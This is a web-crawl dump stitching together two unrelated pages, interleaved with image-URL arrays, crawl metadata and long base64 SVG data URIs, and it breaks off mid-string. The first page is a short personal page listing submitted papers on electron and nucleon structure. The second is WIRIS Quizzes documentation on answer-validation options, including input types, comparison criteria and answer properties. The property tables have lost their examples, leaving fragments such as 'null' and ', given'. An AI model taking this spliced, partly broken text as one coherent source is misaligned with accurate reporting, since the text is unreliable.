Structure of the Electron.\n\nor see the page on the Structure of Nucleons and Quarks.\n\n Structure of the Electron - Correlation of Elementary Charge with Spin in a Singularity Free Electron Model read more This work on the structure of the electron has been submitted to scientific journals in serveral versions.\n Structure of the Quark, Structure of Nucleons and Quarks - Correlation of Proton Mass with Electron Mass read more The work on the composition of the nucleons and quarks has been submitted to a scientific journal, too. Find here the latest version of the submitted paper on the nucleon and quark substructure.", null, "Web Counter by www.webcounter.goweb.de" ]
[ null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image037.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image039.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image041.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image043.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image045.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image047.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image049.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image051.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image053.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image049.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image056.gif", null, "http://webcounter.goweb.de/16876.GIF", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8277554,"math_prob":0.9707032,"size":2226,"snap":"2020-10-2020-16","text_gpt3_token_len":474,"char_repetition_ratio":0.16651665,"word_repetition_ratio":0.021621622,"special_character_ratio":0.19631626,"punctuation_ratio":0.060606062,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9550289,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,5,null,3,null,3,null,3,null,3,null,3,null,6,null,3,null,3,null,6,null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-04T01:42:23Z\",\"WARC-Record-ID\":\"<urn:uuid:30cee7ab-566c-4322-ab17-90d4cf0e9b4b>\",\"Content-Length\":\"15340\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:be78a843-a1ce-407c-bc41-66b7b374624b>\",\"WARC-Concurrent-To\":\"<urn:uuid:975cc544-3770-44aa-945d-3498954f8f80>\",\"WARC-IP-Address\":\"80.150.6.143\",\"WARC-Target-URI\":\"http://www.ccaesar.com/eng_fine_structure_constant.html\",\"WARC-Payload-Digest\":\"sha1:47454EJ2IQM2BNLOQY3IQYUEIEPNWOWC\",\"WARC-Block-Digest\":\"sha1:USCAUOOI56WJKAMQQGGAU5MJWBKNGGHX\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370519111.47_warc_CC-MAIN-20200404011558-20200404041558-00217.warc.gz\"}"}
https://docs.wiris.com/en/quizzes/user_interface/validation/validation
[ "Here you select what kind of input is expected from the student. For example, choose between general mathematical expressions or quantities that involve units. Along with this, you can decide how the correct answer is validated against the student answer. The main function of many of the options is to decide how syntax checking works on the student side. For example [0,1) is normally highlighted as incorrect syntax, unless we choose the Intervals option. The tab is divided into three sections, explained below.\n\nAllowed input\n\nChoose the desired answer type. These can be:\n\n• General: Any mathematical expression. This is the default option, and it is probably the type you need in the majority of cases.\n• Quantity: The most important use of this is for answers with units or currencies. This option would also be appropriate for numerical answers, fractions, ratios, etc. The General option will work for these cases, but you have a few more options with Quantity.\n• Text: For pure text answers with no mathematical content. This option is rarely used. More details here.\n\nThe first two also have a series of options.\n\nOptions for General\n\nOption Description Default\nConstants Which symbols are recognized as mathematical constants (e.g. if i is enabled then i² will be understood as –1). All selected\nFunctions Which function names are recognized by their usual meaning. (e.g. if exp/log is enabled then \"ln(2)\" will be understood and calculated as 0.6931... All selected\nUser Functions Define your own function names to add to the above list. They won't be calculated as anything, but sometimes this option is useful. See this page for an example: user functions Empty\nList Allow lists as answers. Options for list separators are shown below. Selected\nLists always need curly brackets \"{}\" Require that lists be enclosed in curly brackets to be recognized as a list (e.g. if selected \"4,7,88,9\" would not be understood as a list - in fact it would be highlighted as syntactically incorrect). Selected\nIntervals Recognizes interval notation as valid syntax. Expressions like [0,1] are already valid without this, but now we may have for instance ]0,1] or (0,1]. More details here. Unselected\nSeparators Decide which symbols act as decimal, digit, and list separators. Point \".\" : decimal digits\nComma \",\" : list items\nSpace \" \" : Nothing\n\nOptions for Quantity\n\nOption Description Default\nConstants Which symbols are recognized as mathematical constants (e.g. if i is enabled then i² will be understood as –1). π, i, j\nUnits Which units are recognized. It's important to note that \"all\" includes more units than the other 6 shown - it includes all S.I. basic and derived units. all\nUnit prefixes Which unit prefixes are recognized. Again, \"all\" includes more prefixes than the ones shown. M,k,c,m\nMixed fractions Allow mixed fractions to be recognized. Without this option, a number next to a fraction is understood to be multiplying it. Unselected\nList Allow lists as answers. Selected\nSeparators Decide which symbols act as a decimal, digit, and list separators. Additionally, you can use apostrophe ' for decimal mark. You must choose Quantity, and in Options > Units uncheck all, and then uncheck º'\". Point \".\" : decimal digits\nComma \",\" : list items\nSpace \" \" : Nothing\nSee a detailed explanation of lists and sets here.\nSee a detailed explanation of percentages and per mille use here.\n\nComparison with student answer\n\nOnce we've decided what format we expect the student answer to be in, we have a few options for how their answer should be compared to the correct answer.\n\nComparison with student answer criteria\nTolerance This specifies the tolerance criteria used for the comparison between the student's answer and the correct answer. This setting applies globally (to the entire question). The default value is 0.1% percent error. More details\nLiterally equal This removes all mathematical interpretation from the comparison. The student's answer is only correct if it matches the correct answer exactly. For example, if the correct answer is 4 but the student writes 4.0, it will not be counted. This criterion is rarely recommended.\nMathematically equal This is the default comparison. It will detect if what the student has written is mathematically equal to the correct answer. For example, we don't need to worry if the student writes a + b or b + a. More details\nEquivalent equations This comparison is very similar to the above, but it is for the special case where the answer is an equation (e.g. the student could write y = 2x – 5, or , or any equivalent form). More details\nAny answer Anything that the student answers will be counted as correct. This is useful in some cases. More details\nGrading function Define your own function to decide which answers are accepted, and how to grade them. This is an advanced feature. More details\nCompare as sets This is a checkbox that is independent of the above options. When checked, order and repetition are ignored from lists. So, if the correct answer is the set {1,5,2}, then {5,5,5,2,1} (for example) would be accepted. More details\n\nSometimes it's not just the value of the answer that's important, but also its form. This usually happens when you are teaching basic algebraic manipulation, and you want the answer in a very specific form. For example, if you’re teaching how to reduce a fraction, you probably want to accept only the reduced fraction as the correct answer. If so, all other equivalent fractions are wrong, despite having the same value. In this case, we need to select is simplified from the list of Additional properties.\n\nStructure Examples\nCorrect Wrong\nhas integer form It checks whether the answer is a single integer", null, "has fraction form It checks whether the answer is a single fraction or integer", null, "has polynomial form It checks whether the answer is syntactically a polynomial with real or complex coefficients", null, "has rational function form It checks whether the answer has the form of a rational function", null, "is a combination of elementary functions It checks whether the answer is a combination of elemental functions", null, "is expressed in scientific notation It checks whether the answer is in scientific notation", null, "Specific property Examples\nCorrect Wrong\nis simplified It checks whether the expression cannot be simplified", null, "is expanded It checks whether the expression is in its fully expanded form", null, "is factorized It checks whether an integer or a polynomial is factorized", null, "is rationalized It checks whether the expression does not have square (or higher) roots in the denominator. It also checks whether the expression has a pure real denominator (in the case of complex numbers)", null, "doesn't have common factors It checks whether the summands of the answer have no common factors", null, "has minimal radicands It checks whether any present radicands are minimal", null, "is divisible by It checks whether the answer is divisible by the given value", null, ", given", null, "", null, ", given\nhas a single common denominator It checks whether the answer has a single common denominator", null, "has unit equivalent to It checks whether the unit of measurement in the student's answer is equivalent to the given one. Multiples are not equivalent", null, ", given", null, "", null, ", given\nhas unit literally equal to It checks whether the unit of the answer is literally equal to the given one", null, ", given", null, "", null, ", given\nhas precision It check that the response is expressed within a given precision range", null, ", between 3 and 4 significant figures , between 3 and 4 decimal places\n\nFor a complete and advanced description of all the properties, see assertions." ]
[ null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2228%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E123%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2213.5%22%20y%3D%2215%22%3E123%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2241%22%20width%3D%2231%22%20wrs%3Abaseline%3D%2226%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmfrac%3E%3Cmn%3E1%3C%2Fmn%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%226.5%22%20y%3D%2226%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2215.5%22%20x2%3D%2227.5%22%20y1%3D%2220.5%22%20y2%3D%2220.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2221.5%22%20y%3D%2215%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2221.5%22%20y%3D%2237%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E1%3C%2Fmn%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmi%3Ex%3C%2Fmi%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2216.5%22%20y%3D%2216%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2228.5%22%20y%3D%2216%22%3Ex%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2241%22%20width%3D%2218%22%20wrs%3Abaseline%3D%2226%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmfrac%3E%3Cmi%3Ey%3C%2Fmi%3E%3Cmi%3Ex%3C%2Fmi%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%222.5%22%20x2%3D%2214.5%22%20y1%3D%2220.5%22%20y2%3D%2220.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2215%22%3Ey%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2237%22%3Ex%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2224%22%20width%3D%2280%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmi%3Esin%3C%2Fmi%3E%3Cmo%3E(%3C%2Fmo%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E)%3C%2Fmo%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmsqrt%3E%3Cmi%3Ey%3C%2Fmi%3E%3C%2Fmsqrt%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math117e62166fc8586dfa4d1bc0e17'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAoWhlYWQQC2qxAAACMAAAADZoaGVhCGsXSAAAAmgAAAAkaG10eE2rRkcAAAKMAAAACGxvY2EAHTwYAAAClAAAAAxtYXhwBT0FPgAAAqAAAAAgbmFtZaBxlY4AAALAAAABn3Bvc3QB9wD6AAAEYAAAACBwcmVwa1uragAABIAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAACv%2F%2FwAAACv%2F%2F%2F%2FWAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIAAVQLVAqsACwBJARiyDAEBFBMQsQAD9rEBBPWwCjyxAwX1sAg8sQUE9bAGPLENA%2BYAsQAAExCxAQbksQEBExCwBTyxAwTlsQsF9bAHPLEJBOUxMBMhETMRIRUhESMRIYABAFUBAP8AVf8AAasBAP8AVv8AAQAAAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAChAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%40font-face%7Bfont-family%3A'round_brackets18549f92a457f2409'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMjwHLFQAAADMAAAATmNtYXDf7xCrAAABHAAAADxjdnQgBAkDLgAAAVgAAAASZ2x5ZmAOz2cAAAFsAAABJGhlYWQOKih8AAACkAAAADZoaGVhCvgVwgAAAsgAAAAkaG10eCA6AAIAAALsAAAADGxvY2EAAARLAAAC%2BAAAABBtYXhwBIgEWQAAAwgAAAAgbmFtZXHR30MAAAMoAAACOXBvc3QDogHPAAAFZAAAACBwcmVwupWEAAAABYQAAAAHAAAGcgGQAAUAAAgACAAAAAAACAAIAAAAAAAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAo8AMGe%2F57AAAHPgGyAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACgAKf%2F%2FAAAAKAAp%2F%2F%2F%2F2f%2FZAAEAAAAAAAAAAAFUAFYBAAAsAKgDgAAyAAcAAAACAAAAKgDVA1UAAwAHAAA1MxEjEyMRM9XVq4CAKgMr%2FQAC1QABAAD%2B0AIgBtAACQBNGAGwChCwA9SwAxCwAtSwChCwBdSwBRCwANSwAxCwBzywAhCwCDwAsAoQsAPUsAMQsAfUsAoQsAXUsAoQsADUsAMQsAI8sAcQsAg8MTAREAEzABEQASMAAZCQ%2FnABkJD%2BcALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAA%2FtACIAbQAAkATRgBsAoQsAPUsAMQsALUsAoQsAXUsAUQsADUsAMQsAc8sAIQsAg8ALAKELAD1LADELAH1LAKELAF1LAKELAA1LADELACPLAHELAIPDEwARABIwAREAEzAAIg%2FnCQAZD%2BcJABkALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAAAAEAAPW2NYFfDzz1AAMIAP%2F%2F%2F%2F%2FVre7u%2F%2F%2F%2F%2F9Wt7u4AAP7QA7cG0AAAAAoAAgABAAAAAAABAAAHPv5OAAAXcAAA%2F%2F4DtwABAAAAAAAAAAAAAAAAAAAAAwDVAAACIAAAAiAAAAAAAAAAAAAkAAAAowAAASQAAQAAAAMACgACAAAAAAACAIAEAAAAAAAEAABNAAAAAAAAABUBAgAAAAAAAAABAD4AAAAAAAAAAAACAA4APgAAAAAAAAADAFwATAAAAAAAAAAEAD4AqAAAAAAAAAAFABYA5gAAAAAAAAAGAB8A%2FAAAAAAAAAAIABwBGwABAAAAAAABAD4AAAABAAAAAAACAA4APgABAAAAAAADAFwATAABAAAAAAAEAD4AqAABAAAAAAAFABYA5gABAAAAAAAGAB8A%2FAABAAAAAAAIABwBGwADAAEECQABAD4AAAADAAEECQACAA4APgADAAEECQADAFwATAADAAEECQAEAD4AqAADAAEECQAFABYA5gADAAEECQAGAB8A%2FAADAAEECQAIABwBGwBSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAAUgBvAHUAbgBkACAAYgByAGEAYwBrAGUAdABzACAAdwBpAHQAaAAgAGEAcwBjAGUAbgB0ACAAMQA4ADUANABSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFYAZQByAHMAaQBvAG4AIAAyAC4AMFJvdW5kX2JyYWNrZXRzX3dpdGhfYXNjZW50XzE4NTQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAAAAAMAAAAAAAADnwHPAAAAAAAAAAAAAAAAAAAAAAAAAAC5B%2F8AAY2FAA%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2210.5%22%20y%3D%2219%22%3Esin%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2219%22%3E(%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2229.5%22%20y%3D%2219%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2236.5%22%20y%3D%2219%22%3E)%3C%2Ftext%3E%3Ctext%20font-family%3D%22math117e62166fc8586dfa4d1bc0e17%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2246.5%22%20y%3D%2219%22%3E%2B%3C%2Ftext%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(54.5%2C20.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(54.5%2C20.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2266.5%22%20x2%3D%2278.5%22%20y1%3D%224.5%